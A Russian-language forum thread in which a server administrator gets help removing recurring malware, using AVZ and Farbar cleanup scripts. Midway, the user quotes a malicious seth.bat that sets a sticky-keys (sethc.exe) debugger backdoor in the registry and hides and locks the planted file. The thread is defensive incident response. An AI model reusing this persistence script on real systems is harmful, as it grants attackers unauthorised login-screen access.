Перейти к содержанию

В процессах появляются wahiver.exe


serga612

Рекомендуемые сообщения

Добрый день.

На серверах появляются в запущенные процессы

wahiver.exe

Webisida.Browser

SecureSurf.Browser

Кроме этого 2 процесса запускаются как службы.

KVRT это всё удаляет (а ещё быстрее я руками удаляю всю папку C:\Windows\Inf\NETLIBRARIESTIP), но оно возвращается каждый раз - т.е. источник всей этой заразы у меня найти не вышло.

 

Ссылка на комментарий
Поделиться на другие сайты

Cпасибо, сейчас сделаю.

Я читал правила и прикреплял лог, видимо что-то пошло не так, а я этого не заметил.


Кстати говоря, прочитав правила, я сначала запустил KVRT, а после того, как тот отработал - логгер.

Может имеет смысл сначала запустить логгер, до того, как вирусы будут удалены с сервера?

CollectionLog-2019.03.25-13.55.zip

Ссылка на комментарий
Поделиться на другие сайты

Выполните скрипт в AVZ из папки Autologger

begin
if not IsWOW64
 then
  begin
   SearchRootkit(true, true);
   SetAVZGuardStatus(True);
  end;
 DeleteService('werlsfks');
 DeleteService('spoolsrvrs');
 QuarantineFile('C:\Windows\Inf\NETLIBRARIESTIP\000D\1049\5.0\SQL\lsm.exe','');
 QuarantineFile('C:\Windows\Inf\NETLIBRARIESTIP\000D\1049\5.0\1049\5.0\mms.exe','');
 DeleteFile('C:\Windows\Inf\NETLIBRARIESTIP\000D\1049\5.0\1049\5.0\mms.exe','64');
 DeleteFile('C:\Windows\Inf\NETLIBRARIESTIP\000D\1049\5.0\SQL\lsm.exe','64');
BC_ImportAll;
ExecuteSysClean;
BC_Activate;
end.
  • Обратите внимание: перезагрузку компьютера нужно выполнить вручную после скрипта.
Выполните скрипт в AVZ

begin
CreateQurantineArchive('c:\quarantine.zip');
end.
c:\quarantine.zip загрузите по ссылке https://virusinfo.info/upload_virus.php?tid=37678

Полученный после загрузки ответ сообщите здесь.

 

Пожалуйста, ЕЩЕ РАЗ запустите Autologger; прикрепите к следующему сообщению НОВЫЕ логи.

Ссылка на комментарий
Поделиться на другие сайты

Результат загрузки Файл сохранён как 190325_133853_quarantine_5c98d9ed1cfc2.zip Размер файла 8837 MD5 30bc46f472ca5fa8ea41e6f8443c7d13 Файл закачан, спасибо!

Это был ответ по ссылке.

По поводу сборщика логов - странный момент: Первый раз он у меня запустился и отработал нормально.

Теперь всё время выдаёт сообщение: Вы запустили сборщик логов из терминальной сессии  - Пожалуйста, запустите сборщик логов из консоли.

Причём даже при запуске из консоли Hyper-V так происходит.

 

 

 

Ссылка на комментарий
Поделиться на другие сайты

Скачайте Farbar Recovery Scan Tool NAAC5Ba.png и сохраните на Рабочем столе.

  • Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
1. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

2. Убедитесь, что в окне Optional Scan отмечены List BCD, Driver MD5 и 90 Days Files.

3munStB.png

3. Нажмите кнопку Scan.

4. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа.

5. Если программа была запущена в первый раз, также будет создан отчет (Addition.txt).

6. Файлы FRST.txt и Addition.txt заархивируйте (в один общий архив) и прикрепите к сообщению.

Ссылка на комментарий
Поделиться на другие сайты

Задания Планировщика

MonitorProcesses (связана с запуском C:\Temp\MonitProcess.ps1)

MoveItemsConverstionHistory (связана с запуском C:\Temp\moveconversation.ps1)

Вам известны?

 

 

1. Выделите следующий код:

Start::
CreateRestorePoint:
File: C:\Users\adm.a.serga\AppData\Local\Temp\seth.exe
File: C:\Users\adm.a.serga\AppData\Local\Temp\seth.bat
File: C:\Windows\Fonts\web\winlogon.exe
File: C:\Users\adm.a.serga\svchost.exe
S2 spoolsrvrs; C:\Windows\Inf\NETLIBRARIESTIP\000D\1049\5.0\1049\5.0\mms.exe [X]
S2 werlsfks; C:\Windows\Inf\NETLIBRARIESTIP\000D\1049\5.0\SQL\lsm.exe [X]
S3 cpuz139; \??\C:\Users\ADMAPR~1.ITK\AppData\Local\Temp\cpuz139\cpuz139_x64.sys [X] <==== ATTENTION
C:\Windows\Fonts\web\Webisida.Browser.exe
C:\Windows\Fonts\web\taskhost.exe
C:\Windows\Fonts\web\winlogon.exe
C:\Windows\Fonts\web\gecko\securesurf.browser.client.exe
C:\Windows\Inf\NETLIBRARIESTIP
End::
2. Скопируйте выделенный текст (правая кнопка мышиКопировать).

3. Запустите Farbar Recovery Scan Tool.

4. Нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.

  • Обратите внимание: перезагрузку компьютера нужно выполнить вручную после скрипта.
Ссылка на комментарий
Поделиться на другие сайты

Задание планировщика C:\Temp\MonitProcess.ps1 мне известно

C:\Temp\moveconversation.ps1 неи ( и сегодня нет уже людей на работе, которые могли бы прояснить), но я просмотрел текст скрипта и думаю, что знаю, кто его написал и вроде как это не должно запускать вирусы.

Инструкцию выполнил.

FARbar берёт данные из буфера обмена, или в ней пропущен пункт "вставить"?

Лог прилагаю.

Fixlog.txt

Ссылка на комментарий
Поделиться на другие сайты

FARbar берёт данные из буфера обмена

в предложенной мной инструкции именно так.

 

Содержимое C:\Users\adm.a.serga\AppData\Local\Temp\seth.bat процитируйте.

 

C:\Users\adm.a.serga\AppData\Local\Temp\seth.exe повтроно проверьте на virustotal.com, даже если будет показывать, что файл проверялся в начале февраля

 

Сделайте лог МВАМ

Ссылка на комментарий
Поделиться на другие сайты

Содержимое файла seth.bat:

 

echo
copy seth.exe "%windir%\system32" 
set d="%windir%\system32\seth.exe"
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "seth.exe" /f
echo.HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe [19]>"%tmp%"\reg.txt && regini "%tmp%"\reg.txt && del "%tmp%"\reg.txt
 
@attrib +s +h %d%
@echo Y| cacls %d% /t /g SYSTEM:r
@echo S| cacls %d% /t /g SYSTEM:r
@echo J| cacls %d% /t /g SYSTEM:r
@echo O| cacls %d% /t /g SYSTEM:r
@echo E| cacls %d% /t /g SYSTEM:r
 
По вирусинфо:
 
Результат загрузки Файл сохранён как 190326_080804_seth_5c99dde4917e5.zip Размер файла 23254 MD5 fcec401dee584b941eecaef8ecffa33e Файл закачан, спасибо!

 

И лог во вложении.

 

 

mbam05.txt

Ссылка на комментарий
Поделиться на другие сайты

Что с проблемой?

В данный момент на этом сервере она не воспроизводится.

Т.к. серверов несколько (и время от времени оно возникает на них снова) то вариант лечения такой:

KVRT + MBAM + контролировать ключи реестра из файла seth.bat?

Ссылка на комментарий
Поделиться на другие сайты

seth.bat:удалите.

 

 


C:\Users\adm.a.serga\AppData\Local\Temp\seth.exe повтроно проверьте на virustotal.com, даже если будет показывать, что файл проверялся в начале февраля

результат в виде ссылки не увидел, а вместо этого Вы зачем-то загрузили файл на Вирусинфо.
Ссылка на комментарий
Поделиться на другие сайты

 

seth.bat:удалите.

 

 

C:\Users\adm.a.serga\AppData\Local\Temp\seth.exe повтроно проверьте на virustotal.com, даже если будет показывать, что файл проверялся в начале февраля

результат в виде ссылки не увидел, а вместо этого Вы зачем-то загрузили файл на Вирусинфо.

 

Промахнулся.

 

https://www.virustotal.com/gui/file/190ce0a2fc65ec52860899c5597ddbff81d41d0fd673874b9ea0d5fa986e7378/detection

Ссылка на комментарий
Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
  • Похожий контент

    • Ra11lex
      От Ra11lex
      Касперский плюс нашел вирус HEUR: Trojan. Multi.GenBadur.genw Расположение: Системная память, после лечения с перезагрузкой опять его нашел, а потом лечение с перезагрузкой и опять он тут. AVT его тоже находит, лечит, но после перезагрузки он опять тут. Пробовал в безопасном режиме, AVT его уже не находит. Windows 11, с последними обновлениями. Протокол прилагается. Также логи FRST. И результаты отчета uvs. 
      Это уже мой второй ноутбук. Видимо я переносил данные и вирус перенес. Прошлая ветка и решение: 
       
      ОтчетКасперский.txt Addition.txt FRST.txt ITAN_RA_2024-10-24_23-37-40_v4.99.2v x64.7z
    • barank1n
      От barank1n
      Висит примерно уже две недели. Руки дошли только сегодня. Установлен Kaspersky Anti-Virus. Kaspersky обнаруживает этот троян после каждого запуска ПК, даже после лечения.  Образ Windows не официальный. Прикрепляю к данной теме файл с логами.
      CollectionLog-2024.10.22-22.01.zip report1.log report2.log
    • Magashmug
      От Magashmug
      Здравствуйте, после перезагрузки опять появляется вирус, вот мой файл.
      CollectionLog-2024.10.15-18.27.zip
    • KL FC Bot
      От KL FC Bot
      Хотя автоматизация и машинное обучения используются в ИБ почти 20 лет, эксперименты в этой области не останавливаются ни на минуту. Защитникам нужно бороться с более сложными киберугрозами и большим числом атак без существенного роста бюджета и численности ИБ-отделов. ИИ помогает значительно разгрузить команду аналитиков и ускорить многие фазы работы с инцидентом — от обнаружения до реагирования. Но ряд очевидных, казалось бы, сценариев применения машинного обучения оказываются недостаточно эффективными.
      Автоматическое обнаружение киберугроз с помощью ИИ
      Предельно упрощая эту большую тему, рассмотрим два основных и давно протестированных способа применения машинного обучения:
      Поиск атак. Обучив ИИ на примерах фишинговых писем, вредоносных файлов и опасного поведения приложений, можно добиться приемлемого уровня обнаружения похожих угроз. Основной подводный камень — эта сфера слишком динамична, злоумышленники постоянно придумывают новые способы маскировки, поэтому модель нужно очень часто обучать заново, чтобы поддерживать ее эффективность. При этом нужен размеченный набор данных, то есть большой набор свежих примеров доказанного вредоносного поведения. Обученный таким образом алгоритм не эффективен против принципиально новых атак, которые он «не видел» раньше. Кроме того, есть определенные сложности при обнаружении атак, целиком опирающихся на легитимные ИТ-инструменты (LOTL). Несмотря на ограничения, этот способ применяется большинством производителей ИБ-решений, например, он весьма эффективен для анализа e-mail, поиска фишинга, обнаружения определенных классов вредоносного программного обеспечения. Однако ни полной автоматизации, ни 100%-ной надежности он не обещает. Поиск аномалий. Обучив ИИ на «нормальной» деятельности серверов и рабочих станций, можно выявлять отклонения от этой нормы, когда, например, бухгалтер внезапно начинает выполнять административные действия с почтовым сервером. Подводные камни — этот способ требует собирать и хранить очень много телеметрии, переобучать ИИ на регулярной основе, чтобы он поспевал за изменениями в ИТ-инфраструктуре. Но все равно ложных срабатываний будет немало, да и обнаружение атак не гарантировано. Поиск аномалий должен быть адаптирован к конкретной организации, поэтому применение такого инструмента требует от сотрудников высокой квалификации как в сфере кибербезопасности, так и в анализе данных и машинном обучении. И подобные «золотые» кадры должны сопровождать систему на ежедневной основе. Подводя промежуточный философский итог, можно сказать, что ИИ прекрасно подходит для решения рутинных задач, в которых предметная область и характеристики объектов редко и медленно меняются: написание связных текстов, распознавание пород собак и тому подобное. Когда за изучаемыми данными стоит активно сопротивляющийся этому изучению человеческий ум, статично настроенный ИИ постепенно становится менее эффективен. Аналитики дообучают и настраивают ИИ вместо того, чтобы писать правила детектирования киберугроз, — фронт работ меняется, но, вопреки распространенному заблуждению, экономии человеческих сил не происходит. При этом стремление повысить уровень ИИ-детектирования угроз (True Positive, TP) неизбежно приводит к увеличению и числа ложноположительных срабатываний (False Positive, FP), а это напрямую увеличивает нагрузку на людей. Если же попытаться свести FP почти к нулю, то понижается и TP, то есть растет риск пропустить кибератаку.
      В результате ИИ занимает свое место в ансамбле инструментов детектирования, но не способен стать «серебряной пулей», то есть окончательно решить проблемы детектирования в ИБ или работать целиком автономно.
      ИИ-напарник аналитика SOC
      ИИ нельзя целиком доверить поиск киберугроз, но он может снизить нагрузку на человека, самостоятельно разбирая простые предупреждения SIEM и подсказывая аналитикам в остальных случаях:
      Фильтрация ложных срабатываний. Обучившись на предупреждениях из SIEM-системы и вердиктах команды аналитиков, ИИ способен достаточно надежно фильтровать ложноположительные срабатывания (FP) — в практике сервиса Kaspersky MDR это снижает нагрузку на команду SOC примерно на 25%. Подробности реализации «автоаналитика» мы опишем в отдельном посте. Приоритизация предупреждений. Тот же механизм машинного обучения может не только фильтровать ложные срабатывания, но и оценивать вероятность того, что обнаружен признак серьезной вредоносной активности. Такие серьезные предупреждения передаются для приоритетного анализа экспертам. Альтернативно «вероятность угрозы» может быть просто визуальным индикатором, помогающим аналитику обрабатывать наиболее важные оповещения с наибольшим приоритетом. Поиск аномалий. ИИ может быстро предупреждать об аномалиях в защищаемой инфраструктуре, отслеживая такие явления, как всплеск количества предупреждений, резкое увеличение или уменьшение потока телеметрии с конкретных сенсоров или изменение ее структуры. Поиск подозрительного поведения. Хотя сложности поиска произвольных аномалий в сети значительны, некоторые частные сценарии хорошо автоматизируются и машинное обучение работает в них эффективней статичных правил. Примеры: поиск несанкционированного использования учетных записей из необычных подсетей, детектирование аномального обращения к файловым серверам и их сканирования, поиск атак с использованием чужих билетов TGS (атаки Pass-the-Ticket). Большие языковые модели в ИБ
      Наиболее модная тема ИИ-индустрии, большие языковые модели (LLM), тоже многократно опробована ИБ-компаниями. Оставляя полностью за скобками такие темы, как написание фишинговых писем и ВПО при помощи GPT, отметим многочисленные интересные эксперименты по привлечению LLM к рутинным работам:
      генерация расширенных описаний киберугроз; подготовка черновиков отчетов по расследованию инцидентов; нечеткий поиск в архивных данных и логах через чат; генерация тестов, тест-кейсов, кода для фаззинга; первичный анализ декомпилированного исходного кода при реверс-инжиниринге; снятие обфускации и объяснение длинных командных строк (такая технология уже используется нашим сервисом MDR); генерация подсказок и рекомендаций при написании детектирующих правил и скриптов. Большинство перечисленных по ссылке работ и статей являются нишевыми внедрениями или научными экспериментами, поэтому они не дают измеримой оценки эффективности. Более того, имеющиеся исследования эффективности квалифицированных работников, которым в помощь выданы LLM, показывают противоречивые результаты. Поэтому внедрение подобных решений должно проводиться медленно и поэтапно, с предварительной оценкой потенциала экономии, детальной оценкой вложенного времени и качества результата.
      View the full article
    • JAZZ and JAZZ
      От JAZZ and JAZZ
      При включении ноутбука и загрузки ОС через 2-5мин начинается нагрев ЦП до 92 градусов GPU до 63 градусов.
      При этом сам запускается процесс fc.exe в видеокарте NVIDIA хотя она должна быть не активной, проблему поймал день назад ноут уходит в сильный перегрев.
      Пробовал лечить, результата нет.
      CollectionLog-2024.10.07-23.37.zip
×
×
  • Создать...